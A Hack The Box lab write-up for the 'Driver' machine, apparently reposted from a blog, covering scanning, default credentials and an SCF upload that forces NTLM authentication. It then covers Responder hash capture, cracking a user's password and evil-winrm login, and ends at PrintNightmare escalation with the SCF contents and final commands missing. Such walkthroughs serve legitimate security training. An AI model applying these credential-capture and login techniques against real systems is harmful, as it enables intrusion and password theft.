secnigma posted: " Prelude Driver is an easy machine from Hack The Box, developed by MrR3boot. This was an easy, but cool box which demonstrated the recent Print Nightmare vulnerability. The initial foothold part was also a pretty cool vector and it taught me how to "
Driver is an easy machine from Hack The Box, developed by MrR3boot. This was an easy, but cool box which demonstrated the recent Print Nightmare vulnerability.
The initial foothold part was also a pretty cool vector and it taught me how to misuse SCF files to dump NTLM hashes.
Let's start the enumeration.
Exploitation
Nmap returned the following results.
Nmap scan report for 10.10.11.106 Host is up (0.048s latency). Not shown: 65531 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=MFP Firmware Update Center. Please enter password for admin | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Port 5985 is open. So, PS-Remoting is possible.
I navigated to http://10.10.11.106/ and found an HTTP basic authentication prompt.
I used admin:admin and I got logged in!
It was a website, where the user can upload firmware files for different printers. The site said that once we upload the file, someone will manually review and test the firmware.
I have tried different payloads like exe file, msi file etc. But, nothing worked.
Upon further research, I've found a way to force NTLM authentication in using different files. I have referenced articles from ired.team, bleepingcomputer and pentestlab about how to use SCF (Shell Command Files) to force NTLM authentication.
SCF files are a different variant of shortcuts and it supports a very limited set of Windows Explorer commands, such as opening a Windows Explorer window or showing the Desktop. The "Show Desktop" shortcut we all use on a daily basis is an SCF file.
An SCF file can be used to access a specific UNC path which allows an attacker to dump the NTLM credential of the victim, if he browses the folder with the malicious SCF file in it . When the victim browses the folder with the malicious SCF file in it, a connection will be automatically established from his system to the UNC path that is described as the icon path in the SCF file. Windows will then try to authenticate to that SMB share with the username and the password of the user and Responder will capture the NTLMv2 hash of the victim.
I created the malicious SCF file with the following contents.
Then I uploaded the SCF file to the firmware upload page fw_up.php and started Responder with the following command and I got the NTLM hash of the user tony.
sudo responder -I tun0
I then used a supercool hash identification script called NTH (Name-That-Hash) to find the hashtype and the hashcat/jtr mode number. Name-That-Hash Can be cloned from here or it can be installed in Kali linux using the command sudo apt install name-that-hash
We can pass hashes explicitly via the -t flag or we can use the -f flag to pass a file containing hashes to Name-That-Hash. Syntax: nth -t <HASH> OR nth -f <FILE-LOCATION>
The hash got cracked and the password for the user tony was liltony.
I then used evil-winrm to login as tony, since port 5985 is open.
evil-winrm -u tony -p 'liltony' -i 10.10.11.106
And I got in as tony!
Privilege Escalation
By the nuances I've seen in this machine by far, it was obvious that this machine is vulnerable to the recent Print Nightmare vulnerability.
CVE-2021-1675 / Print Nightmare is a vulnerability in the Print Spooler service, affecting all Windows versions alike. This vulnerability allows anyone with valid credentials in a Windows machine to add a new printer and load drivers for it.
There are more than one way to exploit this vulnerability and you can read more about them from 0xdf's blog.
I used the Powershell script hosted in this github repo, mentioned in 0xdf's blog.
I used evil-winrm's upload feature to upload the script. After that, I used the following commands to load and execute the script.
No comments:
Post a Comment